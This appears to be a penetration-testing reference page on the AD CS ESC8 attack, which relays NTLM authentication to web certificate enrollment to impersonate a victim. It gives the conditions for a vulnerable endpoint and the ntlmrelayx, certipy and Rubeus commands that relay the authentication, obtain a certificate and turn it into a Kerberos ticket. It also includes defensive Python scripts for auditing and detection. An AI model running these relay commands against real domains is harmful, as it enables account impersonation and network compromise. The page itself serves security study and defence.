ADCS - ESC 8

Relay a victim user's NTLM authentication to a vulnerable HTTP(S) AD CS enrollment endpoint in order to impersonate the victim user.

Vulnerable Template Requirements

  • AD CS HTTP endpoint: Web Enrollment (/certsrv) or CES/CEP/NDES reachable (HTTP or HTTPS); NTLM allowed; Extended Protection (EPA/channel binding) disabled.
  • EKU: Client Authentication, PKINIT Client Authentication, or Smartcard Logon; Any Purpose or no EKU only if policy allows.
  • Subject/SAN: Built from AD by the policy module (no enrollee‑supplied subject required).
  • Enrollment Rights: Relayed identity (user/computer) has Enroll (or Autoenroll) on the target template.
  • Issuance Controls: Requires Manager Approval = False; Authorized Signatures Required = 0.
  • Mapping Posture (DCs): Certificate mapping permits logon for the issued cert per domain policy.

If EPA is enabled or NTLM is disabled on the endpoint, relay will fail. If Strong Certificate Mapping is enforced, the issued cert must meet strong‑mapping policy to be usable for logon.
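As an added example (not part of the original page), the following Python script checks the two endpoint preconditions above against the IIS windowsAuthentication fragment for the /certsrv location: NTLM (or plain Negotiate, which can fall back to NTLM) is an accepted provider, and Extended Protection is not set to Require. The two configuration fragments are constructed for the example; the element and attribute names (extendedProtection tokenChecking, providers/add value) are the ones IIS uses in applicationHost.config and web.config. In production you would point it at the output of IIS's own configuration export rather than at inline strings.

```python
"""Audit an IIS windowsAuthentication block for the ESC8 endpoint preconditions.

Added example, not from the original page. The fragments below are constructed.
"""
import xml.etree.ElementTree as ET

# Constructed: the posture a default Web Enrollment install ships with
# (Negotiate + NTLM providers, no <extendedProtection> element at all).
WEAK_CONFIG = """
<location path="Default Web Site/certsrv">
  <system.webServer>
    <security>
      <authentication>
        <anonymousAuthentication enabled="false" />
        <windowsAuthentication enabled="true">
          <providers>
            <add value="Negotiate" />
            <add value="NTLM" />
          </providers>
        </windowsAuthentication>
      </authentication>
    </security>
  </system.webServer>
</location>
"""

# Constructed: the hardened posture (EPA required, Kerberos-only Negotiate).
HARDENED_CONFIG = """
<location path="Default Web Site/certsrv">
  <system.webServer>
    <security>
      <authentication>
        <anonymousAuthentication enabled="false" />
        <windowsAuthentication enabled="true">
          <extendedProtection tokenChecking="Require" />
          <providers>
            <clear />
            <add value="Negotiate:Kerberos" />
          </providers>
        </windowsAuthentication>
      </authentication>
    </security>
  </system.webServer>
</location>
"""


def audit_certsrv_auth(config_xml: str) -> dict:
    """Return findings for one IIS configuration fragment.

    Keys: ntlm_allowed, epa_required, relayable (both preconditions hold).
    A missing <extendedProtection> element means IIS's default of
    tokenChecking="None"; "Allow" also accepts clients that send no channel
    binding, so only "Require" actually blocks a relayed session.
    """
    root = ET.fromstring(config_xml)
    winauth = root if root.tag == "windowsAuthentication" else root.find(".//windowsAuthentication")
    if winauth is None or winauth.get("enabled", "false").lower() != "true":
        # No Windows authentication on the endpoint: nothing to relay NTLM to.
        return {"ntlm_allowed": False, "epa_required": False, "relayable": False}

    epa = winauth.find("extendedProtection")
    token_checking = epa.get("tokenChecking", "None") if epa is not None else "None"
    epa_required = token_checking.lower() == "require"

    # IIS defaults to Negotiate + NTLM when no <providers> list is configured.
    providers_el = winauth.find("providers")
    if providers_el is None:
        providers = ["Negotiate", "NTLM"]
    else:
        providers = []
        for child in providers_el:
            if child.tag == "clear":
                providers = []
            elif child.tag == "add":
                providers.append(child.get("value", ""))
    # Plain "Negotiate" can select NTLM inside SPNEGO when Kerberos is not
    # available; only "Negotiate:Kerberos" pins the endpoint to Kerberos.
    ntlm_allowed = any(p in ("NTLM", "Negotiate") for p in providers)

    return {
        "ntlm_allowed": ntlm_allowed,
        "epa_required": epa_required,
        "relayable": ntlm_allowed and not epa_required,
    }


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit_certsrv_auth(cfg))
```

The same check applies to the CES/CEP virtual directories if they are installed; each has its own location element and must be audited separately.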

Attack Path

1. Relay

Run a relay to capture NTLM authentication and request a certificate as the victim identity.

ntlmrelayx — Catch broad traffic and relay to AD CS (and optionally LDAP/SMB)

ntlmrelayx.py -t http(s)://<adcs_fqdn>/certsrv/certfnsh.asp --adcs --template <TemplateName> -smb2support

ntlmrelayx requires /certsrv/certfnsh.asp for the target.

certipy — Targeted, streamlined AD CS relay (good with predictable coercion like PetitPotam)

certipy relay -target http(s)://<adcs_fqdn>/certsrv/ -ca "<CA_Name>" -template <Template_Name> -out <victim.pfx>

certipy accepts /certsrv/ for the target and resolves internally.

2. Convert PFX to TGT

Linux

certipy auth -pfx <victim>.pfx -dc-ip <dc_ip>

Windows

Rubeus.exe asktgt /user:<target_sam_or_upn> /domain:<domain_fqdn> /dc:<dc_fqdn> /certificate:<C:\path\to\target.pfx> /password:<pfx_password> /ptt

3. Use the credential

Troubleshooting

  • Policy module errors 0x80094800 / 0x8009480F: template requires approval or subject/SAN constraints; pick another template or adjust subject options.
  • Relay connects but no cert: EPA enforced or NTLM disabled on the site; not vulnerable.
  • PFX OK but auth fails: template missing Client Authentication EKU or CA policy didn’t populate UPN; choose a different template.

Detection / Mitigation

  • Require EPA and HTTPS on /certsrv (and CES/CEP if present); prefer Negotiate:Kerberos only.
  • Limit Enroll on client‑auth templates; monitor spikes in issued client‑auth certificates.
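The second mitigation bullet, monitoring spikes in issued client-auth certificates, as an added example that is not part of the original page. The script models the Security-log record a CA writes when it issues a certificate (Event ID 4887, logged when "Issue and manage certificate requests" auditing is enabled on the CA) as constructed tuples and raises two kinds of alert inside a sliding window: one requester being issued more client-auth certificates than expected, and many distinct requesters being issued the same client-auth template in a short span, which is what a relay catching broad traffic looks like from the CA's side. The template list, field names, thresholds and sample events are all assumptions for the example.

```python
"""Flag bursts of client-authentication certificate issuance from CA audit events.

Added example, not from the original page. Events are constructed.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed: templates whose EKU permits logon. In production derive this
# from the templates' EKU lists rather than hard-coding names.
CLIENT_AUTH_TEMPLATES = {"User", "Machine", "DomainController"}

# Constructed Event ID 4887-style records: (timestamp, requester, template, request id).
SAMPLE_EVENTS = [
    ("2024-05-01T09:00:05", "CORP\\alice", "User", 1201),
    ("2024-05-01T09:30:10", "CORP\\WS01$", "Machine", 1202),
    ("2024-05-01T10:15:00", "CORP\\bob", "User", 1203),
    ("2024-05-01T11:02:00", "CORP\\DC01$", "DomainController", 1204),
    # One account issued three client-auth certs in three minutes.
    ("2024-05-01T12:00:00", "CORP\\svc-backup", "User", 1205),
    ("2024-05-01T12:01:30", "CORP\\svc-backup", "User", 1206),
    ("2024-05-01T12:03:00", "CORP\\svc-backup", "User", 1207),
    # Not a client-auth template: ignored by both rules.
    ("2024-05-01T12:30:00", "CORP\\build01$", "CodeSigning", 1208),
    # Seven distinct identities issued the same template within three minutes.
    ("2024-05-01T13:00:00", "CORP\\carol", "User", 1209),
    ("2024-05-01T13:00:20", "CORP\\dave", "User", 1210),
    ("2024-05-01T13:00:45", "CORP\\erin", "User", 1211),
    ("2024-05-01T13:01:10", "CORP\\frank", "User", 1212),
    ("2024-05-01T13:01:40", "CORP\\grace", "User", 1213),
    ("2024-05-01T13:02:15", "CORP\\heidi", "User", 1214),
    ("2024-05-01T13:03:00", "CORP\\ivan", "User", 1215),
]


def detect_issuance_bursts(events, window=timedelta(minutes=10),
                           per_requester_max=2, distinct_requesters_max=5):
    """Return a list of alert strings, in the order the alerts fire.

    Rules, both limited to CLIENT_AUTH_TEMPLATES:
      * a requester is issued more than per_requester_max certs within `window`
      * more than distinct_requesters_max distinct requesters are issued the
        same template within `window`
    Each (rule, key) pair fires once so a long burst does not flood the output.
    """
    alerts = []
    per_requester = defaultdict(deque)  # requester -> deque of (ts, request id)
    per_template = defaultdict(deque)   # template  -> deque of (ts, requester)
    fired = set()

    for ts_str, requester, template, request_id in sorted(events):
        if template not in CLIENT_AUTH_TEMPLATES:
            continue
        ts = datetime.fromisoformat(ts_str)

        q = per_requester[requester]
        q.append((ts, request_id))
        while q and ts - q[0][0] > window:
            q.popleft()
        if len(q) > per_requester_max and ("requester", requester) not in fired:
            fired.add(("requester", requester))
            ids = [rid for _, rid in q]
            alerts.append(f"{requester}: {len(q)} client-auth certs within {window}; request ids {ids}")

        t = per_template[template]
        t.append((ts, requester))
        while t and ts - t[0][0] > window:
            t.popleft()
        distinct = {r for _, r in t}
        if len(distinct) > distinct_requesters_max and ("template", template) not in fired:
            fired.add(("template", template))
            alerts.append(f"template {template}: {len(distinct)} distinct requesters within {window}")

    return alerts


if __name__ == "__main__":
    for line in detect_issuance_bursts(SAMPLE_EVENTS):
        print(line)
```

The thresholds are deliberately low so the constructed data trips them; in a real environment set them from a baseline of normal autoenrollment volume, and correlate hits with IIS logs for POSTs to /certsrv/certfnsh.asp, since Web Enrollment is the only path ESC8 uses.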